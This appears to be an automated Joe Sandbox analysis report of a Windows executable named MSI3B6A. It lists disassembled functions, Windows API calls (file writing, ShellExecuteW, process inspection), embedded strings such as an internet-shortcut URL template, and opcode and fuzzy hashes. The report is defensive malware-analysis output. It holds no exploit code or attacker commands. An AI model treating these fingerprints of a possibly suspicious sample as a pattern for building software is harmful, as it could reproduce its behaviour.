GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,007100E2,00000000,00000000,00000004,0070ED14,00000000,00000004,0070F127,00000000,00000000), ref: 00712410

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 773fe2f644266aab0c164eb5cecef5da6c99cf9c58065691dc43fdb0d6b86932
Instruction ID: 27ee8d6daa4454537b1bd473f56e4b179de59a49d48bde3f55b4afac0408d072
Opcode Fuzzy Hash: 773fe2f644266aab0c164eb5cecef5da6c99cf9c58065691dc43fdb0d6b86932
Instruction Fuzzy Hash: F4E0D832658154FAE7154B7CAE0FFFA76A8E70074AF504191ED02D40D2DAA9CE51E161

Uniqueness

Uniqueness Score: -1.00%

Function 0071353F Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00713077), ref: 00713544

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6ef950f7e146377037defde61112d9f953b978eb4604ffd7d7ae7508a1d3cf83
Instruction ID: 7c86f2c9a2cb5a991fa28de1eadf9f702c44b93a639b61f24cab29fa4a3c5719
Opcode Fuzzy Hash: 6ef950f7e146377037defde61112d9f953b978eb4604ffd7d7ae7508a1d3cf83
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00720A48 Relevance: .7, Instructions: 655COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
Instruction ID: d178e8bccd8554a45ed21ff72bee74f5ab94bbdf2e27f549756cf9f8b511fb1e
Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
Instruction Fuzzy Hash: 6F32BE74A0022ACFCF28CF98D985ABEB7B5FF54304F644169DC41A7346D636AE46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 007292A9 Relevance: .6, Instructions: 637COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98ae55bca66ffab72cc3832b8526091207e42e2231029f42cbc6827a52a8711a
Instruction ID: 9a8e12e64e5dcc2d3469383ee3b72c0f3dc1a7ac3a2b3e84ddc71b5b684602b1
Opcode Fuzzy Hash: 98ae55bca66ffab72cc3832b8526091207e42e2231029f42cbc6827a52a8711a
Instruction Fuzzy Hash: C1322421D29F514DE7239634DC62339A258AFB73C5F19D737F91AB5AAAEB2CC4834100

Uniqueness

Uniqueness Score: -1.00%

Function 0071A915 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50ffd038d84d2d48537b3e9d3bff318483cbdfa8a0e3b66c3bc162fff3258fed
Instruction ID: cdc913ea75cd9a8bee7aee8bcf78912bbd1ec868de022de6014b0b8810a3a4f1
Opcode Fuzzy Hash: 50ffd038d84d2d48537b3e9d3bff318483cbdfa8a0e3b66c3bc162fff3258fed
Instruction Fuzzy Hash: 10E19D70602605AFCB24CF6CC584AEAB7F1FF45310F24865AD4969B2D1D738ADC6CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0072D8D5 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 3471368781-0
Opcode ID: 825e91a64b941626c2eb9ba26ec53ef3881d5e41f781fbff43db71980959abfb
Instruction ID: b3db26c0eb7f490d26b32e47279e09d48bce948c8b7f02b61180e6e732279746
Opcode Fuzzy Hash: 825e91a64b941626c2eb9ba26ec53ef3881d5e41f781fbff43db71980959abfb
Instruction Fuzzy Hash: 7FB106755007559BDB389F28DC96BBBB3B8EF44308F14456DE983C6680EA79ED81C710

Uniqueness

Uniqueness Score: -1.00%

Function 0071C2CA Relevance: .2, Instructions: 158COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
Instruction ID: 7f1bf18546dc9305fe17ebf93ce5b495eecd525b24047fdc0c73b7849e62907b
Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
Instruction Fuzzy Hash: 2C518572E00259EFDF15CF99C951AEEBBB2EF88310F19805DE815AB241C7389E50CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00714920 Relevance: .1, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 3a63d3c14f6f77f58375878c79a9f2eeb06a1a42ef229cb343a70ec3c41a349f
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 5811EBB720114243D714C63ED4B45FBE795EBC632572D437AD1918B7D8D22AF9C5DA00

Uniqueness

Uniqueness Score: -1.00%

Function 0072AD78 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
Instruction ID: cc4767fc7d63b2fdd2d1c9fea4d59ae39a887ce3f74de134cad6181e8e11d21f
Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
Instruction Fuzzy Hash: 30E08C72A11238EBCB14DB98DA1898AF3ECFB84B01B15049AF501D3601C278DE00D7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00722DCC Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
Instruction ID: af42219ac7db5a7fee0ff0313f13e571a665ca336782cb4f26b8f20dbc3e8abe
Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
Instruction Fuzzy Hash: 12C08C34240EA0B7CE2D8D10AEB13B83394B791782F80058CC4030BA4BC51EEC83D601

Uniqueness

Uniqueness Score: -1.00%

Function 00710116 Relevance: 30.3, APIs: 20, Instructions: 287COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0071011D
collate.LIBCPMT ref: 00710126

Part of subcall function 0070EDF2: __EH_prolog3_GS.LIBCMT ref: 0070EDF9
Part of subcall function 0070EDF2: __Getcoll.LIBCPMT ref: 0070EE5D

__Getcoll.LIBCPMT ref: 0071016C
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00710180
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00710195
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 007101D3
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 007101E6
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0071022C
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00710260
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0071031B
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0071032E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0071034B
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00710368
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00710385
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 007102BD

Part of subcall function 006F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 006F8C50
Part of subcall function 006F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 006F8C78

numpunct.LIBCPMT ref: 007103C4
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 007103D4
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00710418

Part of subcall function 006F6330: LocalAlloc.KERNEL32(00000040,?,00700E04,00000020,?,?,006F9942,00000000,DBD9785B,?,?,?,?,007350DD,000000FF), ref: 006F6336

std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0071042B
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00710448

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
String ID:
API String ID: 3717464618-0
Opcode ID: d5be0259f9086aa3ed12f56218a2b600ca434f9a48d7770a5ad5a2913cca60f3
Instruction ID: 180817128f34afa04931c6adef22b0b05c6a2c1cc2b944b66b030125b4f25fd4
Opcode Fuzzy Hash: d5be0259f9086aa3ed12f56218a2b600ca434f9a48d7770a5ad5a2913cca60f3
Instruction Fuzzy Hash: 3E911C71901219ABE7607FB84C06BBF79AAEF01320F10456DF949A72C2DBBC5D4053E6

Uniqueness

Uniqueness Score: -1.00%

Function 006F6600 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 319filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 006F667E
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 006F66D7
LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 006F66E2
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 006F66FE
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,007349E5,000000FF), ref: 006F67DB
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,007349E5,000000FF), ref: 006F67E7
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,007349E5), ref: 006F682F
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,007349E5,000000FF), ref: 006F684A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,007349E5), ref: 006F6867
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,007349E5,000000FF), ref: 006F6891
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 006F68D8
ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 006F692A
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,007349E5,000000FF), ref: 006F695C

Strings

open, xrefs: 006F68D1, 006F68F0
URL Shortcut content:, xrefs: 006F6875
-_.~!*'();:@&=+$,/?#[], xrefs: 006F6757, 006F676E
[InternetShortcut]URL=, xrefs: 006F670A

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
API String ID: 2199533872-3004881174
Opcode ID: a7f154dd446f7beb9c20d321d1351e1771d1d5fbd3bc4247e6482e3cfa4ed428
Instruction ID: d429ee0271a14f1c3a0f705eb640807db65e5d2d0b08a78b6b8d6babbdf2e264
Opcode Fuzzy Hash: a7f154dd446f7beb9c20d321d1351e1771d1d5fbd3bc4247e6482e3cfa4ed428
Instruction Fuzzy Hash: 49B102B190424DAFEB20DF68CC86BFEBBA6AF45700F144129F614AB2C1D7759A04C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00712B8C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0074DD3C,00000FA0,?,?,00712B6A), ref: 00712B98
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00712B6A), ref: 00712BA3
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00712B6A), ref: 00712BB4
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00712BC6
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00712BD4
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00712B6A), ref: 00712BF7
DeleteCriticalSection.KERNEL32(0074DD3C,00000007,?,?,00712B6A), ref: 00712C13
CloseHandle.KERNEL32(00000000,?,?,00712B6A), ref: 00712C23

Strings

WakeAllConditionVariable, xrefs: 00712BCC
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00712B9E
kernel32.dll, xrefs: 00712BAF
SleepConditionVariableCS, xrefs: 00712BC0

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 6c3b94080c23b3dd97c70e0563ef08d9bb133095c29d3dbffe4fc97546fdc6b8
Instruction ID: c844e9e168cad1d7a34a9c87bb6bfe6949ec881835eb33ee8b3ebfcddd3d8e1a
Opcode Fuzzy Hash: 6c3b94080c23b3dd97c70e0563ef08d9bb133095c29d3dbffe4fc97546fdc6b8
Instruction Fuzzy Hash: 6801B5F5B49311ABF7351F78AC09A963B989F85B42B108812BD44D21E1EBBCCC41CA79

Uniqueness

Uniqueness Score: -1.00%

Function 00715CAF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00715DAC
type_info::operator==.LIBVCRUNTIME ref: 00715DCE
___TypeMatch.LIBVCRUNTIME ref: 00715EDD
IsInExceptionSpec.LIBVCRUNTIME ref: 00715FAF
_UnwindNestedFrames.LIBCMT ref: 00716033
CallUnexpected.LIBVCRUNTIME ref: 0071604E

Strings

csm, xrefs: 00715E05
csm, xrefs: 00715CEC
csm, xrefs: 00715D59

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 89759f44e3437c4db54a386a7494c3b7044ac0cbf969517ee51950242c6ce4e4
Instruction ID: 2c18ed8a1b07881643c588bf5c9de0d48a8771ba3cbb9d844159321f1421661d
Opcode Fuzzy Hash: 89759f44e3437c4db54a386a7494c3b7044ac0cbf969517ee51950242c6ce4e4
Instruction Fuzzy Hash: 33B19E71D00609EFCF18DFA8D8859EEB7B5FF84310F14415AE8156B282D778EA92CB91

Uniqueness

Uniqueness Score: -1.00%

Function 006F4270 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,DBD9785B,?,?,?), ref: 006F42D2
OpenProcess.KERNEL32(00000400,00000000,?,?,DBD9785B,?,?,?), ref: 006F42F3
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,DBD9785B,?,?,?), ref: 006F4326
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,DBD9785B,?,?,?), ref: 006F4337
CloseHandle.KERNEL32(00000000,?,DBD9785B,?,?,?), ref: 006F4355
CloseHandle.KERNEL32(00000000,?,DBD9785B,?,?,?), ref: 006F4371
CloseHandle.KERNEL32(00000000,?,DBD9785B,?,?,?), ref: 006F4399
CloseHandle.KERNEL32(00000000,?,DBD9785B,?,?,?), ref: 006F43B5
CloseHandle.KERNEL32(00000000,?,DBD9785B,?,?,?), ref: 006F43D3
CloseHandle.KERNEL32(00000000,?,DBD9785B,?,?,?), ref: 006F43EF

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: CloseHandle$Process$OpenTimes
String ID:
API String ID: 1711917922-0
Opcode ID: ce2bd987ec1763a02925850b350ee319cdad90db7188d078309dcc67bb285ea1
Instruction ID: 39d4a0627d338ff353d1c9a917c4a72a2bf47fe7ad7e58715c43e39b3f176f1e
Opcode Fuzzy Hash: ce2bd987ec1763a02925850b350ee319cdad90db7188d078309dcc67bb285ea1
Instruction Fuzzy Hash: C5519DB1D02618EBDB14CF99C984BEEBBF5FF48711F244228E610B7780CB7459019BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0070BBBD Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070BBC4

Part of subcall function 0070254E: __EH_prolog3.LIBCMT ref: 00702555
Part of subcall function 0070254E: std::_Lockit::_Lockit.LIBCPMT ref: 0070255F
Part of subcall function 0070254E: std::_Lockit::~_Lockit.LIBCPMT ref: 007025D0

Strings

:AM:am:PM:pm, xrefs: 0070BF2A
%H : %M, xrefs: 0070BD03
%m / %d / %y, xrefs: 0070BCBB
%b %d %H : %M : %S %Y, xrefs: 0070BE52
%d / %m / %y, xrefs: 0070BEFA
%I : %M : %S %p, xrefs: 0070BF1F
%H : %M : %S, xrefs: 0070BD5D

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1538362411-2891247106
Opcode ID: fb43c05c448102044e04c8c810ac7e4d0e841cdb1a2c64bc4d6fefd4e1f44371
Instruction ID: f53692b45544b6b1bac5f2c5779abffe09b2872660298585c200722b67cd1445
Opcode Fuzzy Hash: fb43c05c448102044e04c8c810ac7e4d0e841cdb1a2c64bc4d6fefd4e1f44371
Instruction Fuzzy Hash: 9EB17D7250010AEBDF19DF68CDA9EFE7BE9EB14304F144219FA06A62D1D7399B10DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00710C9D Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00710CA4

Part of subcall function 006F9270: std::_Lockit::_Lockit.LIBCPMT ref: 006F92A0
Part of subcall function 006F9270: std::_Lockit::_Lockit.LIBCPMT ref: 006F92C2
Part of subcall function 006F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 006F92EA
Part of subcall function 006F9270: std::_Lockit::~_Lockit.LIBCPMT ref: 006F9422

Strings

:AM:am:PM:pm, xrefs: 0071100A
%H : %M, xrefs: 00710DE3
%m / %d / %y, xrefs: 00710D9B
%b %d %H : %M : %S %Y, xrefs: 00710F32
%d / %m / %y, xrefs: 00710FDA
%I : %M : %S %p, xrefs: 00710FFF
%H : %M : %S, xrefs: 00710E3D

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
